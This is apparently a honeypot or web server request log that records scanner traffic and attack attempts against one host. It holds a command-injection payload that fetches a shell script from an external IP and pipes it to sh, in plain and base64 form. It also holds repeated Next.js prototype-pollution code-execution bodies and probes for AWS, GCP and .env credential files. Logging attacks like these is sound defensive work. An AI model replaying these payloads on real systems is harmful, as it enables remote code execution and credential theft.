Query: action=cgi_query&queryb64str=eHx3Z2V0IC1xTy0gaHR0cDovLzQ1LjE0OC4xMjAuMjMvYmlucy9rbGEuc2ggMj4vZGV2L251bGx8c2ggLXMgc2VjcmV0ICY%3D
Path: /cgi-bin/nobody/Search.cgi
URL: /cgi-bin/nobody/Search.cgi?action=cgi_query&queryb64str=eHx3Z2V0IC1xTy0gaHR0cDovLzQ1LjE0OC4xMjAuMjMvYmlucy9rbGEuc2ggMj4vZGV2L251bGx8c2ggLXMgc2VjcmV0ICY%3D
Method: GET
[2026-02-23 20:24:19] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:36776
Query: action=cgi_query&username=x%7Cwget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+secret+%26
Path: /cgi-bin/nobody/Search.cgi
URL: /cgi-bin/nobody/Search.cgi?action=cgi_query&username=x%7Cwget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+secret+%26
Method: GET
[2026-02-23 20:24:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:36750
Query: action=cgi_query&queryb64str=eDt3Z2V0IC1xTy0gaHR0cDovLzQ1LjE0OC4xMjAuMjMvYmlucy9rbGEuc2ggMj4vZGV2L251bGx8c2ggLXMgc2VjcmV0ICY%3D
Path: /cgi-bin/nobody/Search.cgi
URL: /cgi-bin/nobody/Search.cgi?action=cgi_query&queryb64str=eDt3Z2V0IC1xTy0gaHR0cDovLzQ1LjE0OC4xMjAuMjMvYmlucy9rbGEuc2ggMj4vZGV2L251bGx8c2ggLXMgc2VjcmV0ICY%3D
Method: GET
[2026-02-23 20:24:09] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:35216
Query: action=cgi_query&username=x%3Bwget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+secret+%26
Path: /cgi-bin/nobody/Search.cgi
URL: /cgi-bin/nobody/Search.cgi?action=cgi_query&username=x%3Bwget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+secret+%26
Method: GET
[2026-02-23 20:24:01] === HTTP Request ===
[2026-02-23 20:23:55] Main page accessed - IP: 204.76.203.8:50904
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:50904
Path: /
URL: /
Method: GET
[2026-02-23 20:23:55] === HTTP Request ===
[2026-02-23 19:34:57] Main page accessed - IP: 204.76.203.8:49052
===================
Connection: close
Accept: text/html,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:49052
Path: /
URL: /
Method: GET
[2026-02-23 19:34:57] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:42250
Path: /jars
URL: /jars
Method: GET
[2026-02-23 18:36:29] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50031
Path: /gcp_credentials.json
URL: /gcp_credentials.json
Method: GET
[2026-02-23 18:17:07] === HTTP Request ===
[2026-02-23 15:20:43] Main page accessed - IP: 207.90.244.27:44442
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.27:44442
Path: /
URL: /
Method: GET
[2026-02-23 15:20:43] === HTTP Request ===
===================
Connection: close
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.231.89.240:54439
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-23 14:38:51] === HTTP Request ===
[2026-02-23 14:35:59] Main page accessed - IP: 91.231.89.183:35047
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Accept-Language: en-US,en;q=0.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.231.89.183:35047
Path: /
URL: /
Method: GET
[2026-02-23 14:35:59] === HTTP Request ===
===================
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept: */*
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.42.231.241:26204
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-02-23 14:05:25] === HTTP Request ===
===================
------WebKitFormBoundaryx1433291777997--
------WebKitFormBoundaryx1433291777997
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1433291777997
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 323327+true+4432948;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1433291777997
X-Nextjs-Html-Request-Id: ilovepoop_1433291777997
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1433291777997
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.194.92.38:48570
Path: /api/route
URL: /api/route
Method: POST
[2026-02-23 13:34:02] === HTTP Request ===
===================
------WebKitFormBoundaryx706208687801--
------WebKitFormBoundaryx706208687801
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx706208687801
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 229300+true+3079846;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx706208687801
Connection: close
Content-Length: 518
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
X-Nextjs-Html-Request-Id: ilovepoop_706208687801
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx706208687801
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.194.92.38:48560
Path: /app
URL: /app
Method: POST
[2026-02-23 13:34:00] === HTTP Request ===
===================
------WebKitFormBoundaryx1291037029444--
------WebKitFormBoundaryx1291037029444
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1291037029444
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 218183+true+5917221;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1291037029444
X-Nextjs-Html-Request-Id: ilovepoop_1291037029444
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1291037029444
Accept-Encoding: gzip, deflate
Content-Length: 522
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.194.92.38:40104
Path: /_next/server
URL: /_next/server
Method: POST
[2026-02-23 13:33:58] === HTTP Request ===
===================
------WebKitFormBoundaryx108384646801--
------WebKitFormBoundaryx108384646801
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx108384646801
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 203880+true+531610;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx108384646801
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Connection: close
Content-Length: 517
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx108384646801
X-Nextjs-Html-Request-Id: ilovepoop_108384646801
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.194.92.38:40088
Path: /api
URL: /api
Method: POST
[2026-02-23 13:33:56] === HTTP Request ===
===================
------WebKitFormBoundaryx32852697331--
------WebKitFormBoundaryx32852697331
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx32852697331
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 21134+true+1554495;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx32852697331
Connection: close
Content-Length: 513
X-Nextjs-Html-Request-Id: ilovepoop_32852697331
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx32852697331
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.194.92.38:40084
Path: /_next
URL: /_next
Method: POST
[2026-02-23 13:33:54] === HTTP Request ===
[2026-02-23 13:33:52] Main page accessed - IP: 45.194.92.38:40068
===================
------WebKitFormBoundaryx1059302558298--
------WebKitFormBoundaryx1059302558298
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1059302558298
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 253511+true+4178527;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1059302558298
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1059302558298
Accept-Encoding: gzip, deflate
Next-Action: x
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1059302558298
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.194.92.38:40068
Path: /
URL: /
Method: POST
[2026-02-23 13:33:52] === HTTP Request ===
[2026-02-23 11:27:47] Main page accessed - IP: 176.65.139.8:39678
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.139.8:39678
Path: /
URL: /
Method: GET
[2026-02-23 11:27:47] === HTTP Request ===
[2026-02-23 08:59:50] Main page accessed - IP: 34.79.124.224:36384
===================
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.79.124.224:36384
Path: /
URL: /
Method: GET
[2026-02-23 08:59:50] === HTTP Request ===
[2026-02-23 07:24:06] Main page accessed - IP: 104.155.20.12:38384
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 104.155.20.12:38384
Path: /
URL: /
Method: GET
[2026-02-23 07:24:06] === HTTP Request ===
[2026-02-23 04:55:48] Main page accessed - IP: 172.104.11.51:20502
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 172.104.11.51:20502
Path: /
URL: /
Method: GET
[2026-02-23 04:55:48] === HTTP Request ===
[2026-02-23 04:32:34] Main page accessed - IP: 172.104.210.105:50281
===================
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 172.104.210.105:50281
Path: /
URL: /
Method: GET
[2026-02-23 04:32:34] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.142:11140
Path: /security.txt
URL: /security.txt
Method: GET
[2026-02-23 04:20:38] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.142:11094
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-23 04:20:35] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.153.142:11078
Path: *
URL: *
Method: PRI
[2026-02-23 04:20:34] === HTTP Request ===
[2026-02-23 04:20:34] Main page accessed - IP: 66.132.153.142:11062
===================
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.142:11062
Path: /
URL: /
Method: GET
[2026-02-23 04:20:34] === HTTP Request ===
[2026-02-23 04:20:31] Main page accessed - IP: 66.132.153.142:7118
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.142:7118
Path: /
URL: /
Method: GET
[2026-02-23 04:20:31] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.140:7227
RemoteAddr: 176.65.134.3:17844
Path:
URL: //185.65.245.140:7227
Method: CONNECT
[2026-02-23 02:55:38] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 194.164.107.6:34444
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-23 02:14:16] === HTTP Request ===
[2026-02-23 02:13:40] Main page accessed - IP: 194.164.107.6:43978
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 194.164.107.6:43978
Path: /
URL: /
Method: GET
[2026-02-23 02:13:40] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:35536
Path: /jars
URL: /jars
Method: GET
[2026-02-23 02:04:00] === HTTP Request ===
===================
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Pragma: no-cache
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 64.62.156.20:14507
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-02-23 00:52:35] === HTTP Request ===
[2026-02-23 00:52:21] Main page accessed - IP: 64.62.156.15:22181
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 64.62.156.15:22181
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-02-23 00:52:21] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.21:51751
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-23 00:51:56] === HTTP Request ===
[2026-02-23 00:51:24] Main page accessed - IP: 64.62.156.10:37850
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.10:37850
Path: /
URL: /
Method: GET
[2026-02-23 00:51:24] === HTTP Request ===
[2026-02-22 23:36:28] Main page accessed - IP: 185.247.137.250:55421
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: mail.anzan.tech:8081
RemoteAddr: 185.247.137.250:55421
Path: /
URL: /
Method: GET
[2026-02-22 23:36:28] === HTTP Request ===
[2026-02-22 23:13:45] Main page accessed - IP: 207.90.244.26:52056
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.26:52056
Path: /
URL: /
Method: GET
[2026-02-22 23:13:45] === HTTP Request ===
[2026-02-22 22:49:26] Main page accessed - IP: 176.65.139.8:59394
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.139.8:59394
Path: /
URL: /
Method: GET
[2026-02-22 22:49:26] === HTTP Request ===
[2026-02-22 22:25:54] Main page accessed - IP: 147.185.132.165:63916
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 147.185.132.165:63916
Path: /
URL: /
Method: GET
[2026-02-22 22:25:54] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-For: 47.108.114.130
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51418
Path: /config.js
URL: /config.js
Method: GET
[2026-02-22 20:48:07] === HTTP Request ===
[2026-02-22 20:48:06] Main page accessed - IP: 172.30.0.12:51418
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 47.108.114.130
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Via: 1.1 Caddy
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Length: 14
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51418
Path: /
URL: /
Method: GET
[2026-02-22 20:48:06] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-For: 47.108.114.130
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51418
Path: /config/aws.yml
URL: /config/aws.yml
Method: GET
[2026-02-22 20:48:06] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9,fr;q=0.8
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-For: 47.108.114.130
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51418
Path: /.aws/credentials
URL: /.aws/credentials
Method: GET
[2026-02-22 20:48:05] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9,fr;q=0.8
X-Forwarded-Proto: https
X-Forwarded-For: 47.108.114.130
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51418
Path: /info.php
URL: /info.php
Method: GET
[2026-02-22 20:48:04] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 47.108.114.130
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
X-Forwarded-Proto: https
Via: 1.1 Caddy
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51418
Path: /.env.bak
URL: /.env.bak
Method: GET
[2026-02-22 20:48:04] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
X-Forwarded-For: 47.108.114.130
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51418
Path: /aws.yml
URL: /aws.yml
Method: GET
[2026-02-22 20:48:03] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
X-Forwarded-For: 47.108.114.130
Via: 1.1 Caddy
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51418
Path: /phpinfo
URL: /phpinfo
Method: GET
[2026-02-22 20:48:02] === HTTP Request ===
===================
X-Forwarded-For: 47.108.114.130
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51418
Path: /phpinfo.php
URL: /phpinfo.php
Method: GET
[2026-02-22 20:48:02] === HTTP Request ===
===================
Via: 1.1 Caddy
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 47.108.114.130
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51418
Path: /_profiler/phpinfo
URL: /_profiler/phpinfo
Method: GET
[2026-02-22 20:48:00] === HTTP Request ===
===================
